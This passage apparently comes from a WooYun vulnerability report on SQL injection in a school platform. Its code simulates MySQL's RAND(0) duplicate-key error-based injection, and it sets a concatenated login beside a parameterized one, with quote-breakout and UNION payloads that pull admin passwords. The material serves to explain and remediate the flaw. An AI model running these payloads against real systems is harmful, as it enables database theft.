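    recurrence from mysys/my_rnd.c, seeded as Item_func_rand does for RAND(n)."""

    def __init__(self, seed: int):
        self.seed1 = (seed * 0x10001 + 55555555) % MASK
        self.seed2 = (seed * 0x10000001) % MASK

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MASK
        self.seed2 = (self.seed1 + self.seed2 + 33) % MASK
        return self.seed1 / MASK


def floor_rand0_times_2(n: int) -> list:
    """First n values of FLOOR(RAND(0)*2) as MySQL produces them: 0,1,1,0,1,1,..."""
    r = MySQLRand(0)
    return [int(r.next() * 2) for _ in range(n)]


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 (ER_DUP_ENTRY)."""


def group_by_with_double_eval(row_count: int, key_expr) -> dict:
    """Simplified model of MySQL's temp-table GROUP BY over an expression:
    the key is computed once to look the group up and, when the group is new,
    computed a second time for the row that gets inserted. With a key that
    changes between the two evaluations, the insert can collide with an
    existing group, which MySQL reports as a duplicate-key error."""
    groups = {}
    for _ in range(row_count):
        probe = key_expr()
        if probe in groups:
            groups[probe] += 1
            continue
        inserted = key_expr()  # second evaluation; may differ from `probe`
        if inserted in groups:
            raise DuplicateEntry(f"Duplicate entry '{inserted}' for key 'group_key'")
        groups[inserted] = 1
    return groups


def hex_literal(h: str) -> str:
    """Decode a MySQL 0x... string literal (sqlmap's result markers)."""
    return bytes.fromhex(h[2:]).decode("ascii")


def run_error_based_payload(leaked: str, row_count: int = 40,
                            left: str = "0x3a6a636f3a",
                            right: str = "0x3a7162653a") -> str:
    """Simulates
        SELECT COUNT(*), CONCAT(left, (<subquery>), right, FLOOR(RAND(0)*2)) x
        FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
    where <subquery> yields `leaked` on every row. Returns the MySQL error text
    (which embeds the leaked value between the markers) or '' if the query
    would have completed without an error."""
    rand = MySQLRand(0)

    def key_expr() -> str:
        return f"{hex_literal(left)}{leaked}{hex_literal(right)}{int(rand.next() * 2)}"

    try:
        group_by_with_double_eval(row_count, key_expr)
    except DuplicateEntry as e:
        return str(e)
    return ""


def extract_leak(error_text: str, left: str = "0x3a6a636f3a",
                 right: str = "0x3a7162653a") -> str:
    """What the client does with the error page: take the text between the
    two markers (':jco:' and ':qbe:' in this report's payloads)."""
    l, r = hex_literal(left), hex_literal(right)
    start = error_text.index(l) + len(l)
    return error_text[start:error_text.index(r, start)]


if __name__ == "__main__":
    print("FLOOR(RAND(0)*2):", floor_rand0_times_2(8))
    err = run_error_based_payload("tiger2010")  # constructed leaked value
    print(err)
    print("leaked:", extract_leak(err))
```

The model needs at least three rows before the collision, which is why the payloads group over a table that always has dozens of rows; the collision is independent of the leaked string, so the inner subquery can be anything that returns one value (version(), database(), or a column fetched with LIMIT n,1, which is how the database and table names above were enumerated). Whether the duplicate-key text actually reaches the attacker depends on the application echoing database errors; the MySQL 5.0 servers in this report did.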

Remediation:

You know what to do.
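
The remediation line leaves the fix unsaid, but sqlmap's findings describe the bug precisely: RANDCODE and the route parameter r are concatenated inside single quotes, while SCHOOL_ID is concatenated bare ("Unescaped numeric"), which is why only SCHOOL_ID also yielded UNION and stacked-query injections: nothing has to be escaped to append SQL after a number. Below is an added example for this page, not the platform's code (which is not published here): a login check written the concatenating way beside a parameterized one. The table names edu_user_student and edu_super_admin come from the dumped schema above; the column names, sample rows and login logic are assumptions, and sqlite3 stands in for MySQL so the block runs offline (the stacked-query case is therefore not modelled: sqlite3's execute() refuses multiple statements).

```python
"""Vulnerable vs. parameterized student login, modelled on the injection
contexts sqlmap reported (quoted string vs. bare numeric). Added example;
schema, rows and login logic are constructed, sqlite3 stands in for MySQL."""
import re
import sqlite3

# Constructed stand-in schema. Table names are from the report's table dump;
# the columns and rows are assumptions.
SCHEMA = """
CREATE TABLE edu_user_student (id INTEGER, login_name TEXT, password TEXT, school_id INTEGER);
INSERT INTO edu_user_student VALUES (1, 'stu0001', 'pw-a', 6), (2, 'stu0002', 'pw-b', 12);
CREATE TABLE edu_super_admin (id INTEGER, login_name TEXT, password TEXT);
INSERT INTO edu_super_admin VALUES (9, 'admin', 'admin-secret');
"""


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_login(conn, login_name, password, school_id) -> list:
    """Every parameter is pasted into the SQL text: string ones inside quotes
    (the RANDCODE / r situation), SCHOOL_ID bare (the 'unescaped numeric')."""
    sql = (f"SELECT id, login_name FROM edu_user_student "
           f"WHERE login_name='{login_name}' AND password='{password}' "
           f"AND school_id={school_id}")
    return conn.execute(sql).fetchall()


def safe_login(conn, login_name, password, school_id) -> list:
    """Hardened form: validate the numeric field, then bind every value so the
    driver, not string formatting, decides where data ends and SQL begins."""
    if not re.fullmatch(r"[1-9]\d{0,8}", str(school_id)):
        raise ValueError("SCHOOL_ID must be a positive integer")
    sql = ("SELECT id, login_name FROM edu_user_student "
           "WHERE login_name=? AND password=? AND school_id=?")
    return conn.execute(sql, (login_name, password, int(school_id))).fetchall()


def demo() -> dict:
    """Runs one payload per injection context against both implementations."""
    quoted = "x' OR '1'='1"                     # breaks out of a quoted string
    numeric = ("12 UNION ALL SELECT id, login_name || ':' || password "
               "FROM edu_super_admin")           # no quote to escape after a number
    out = {
        "vuln_quoted": vulnerable_login(fresh_db(), "8888", quoted, 6),
        "vuln_numeric": vulnerable_login(fresh_db(), "8888", "8888", numeric),
        "safe_quoted": safe_login(fresh_db(), "8888", quoted, 6),
        "safe_legit": safe_login(fresh_db(), "stu0002", "pw-b", "12"),
    }
    try:
        safe_login(fresh_db(), "8888", "8888", numeric)
        out["safe_numeric"] = "accepted"
    except ValueError:
        out["safe_numeric"] = "rejected"
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:13} {result}")
```

Binding alone already defeats all four injection types sqlmap listed (error-based, boolean, UNION, stacked), because the payload never becomes SQL text; the regex on SCHOOL_ID is a second line of defence that also gives a clean error instead of a database error for a tampered value, which matters here because the error-based technique relies on database errors reaching the response.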

Copyright notice: when reposting, please credit the source: qqdaxingxing@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-07-29 09:43

Vendor reply:

Latest status:

None yet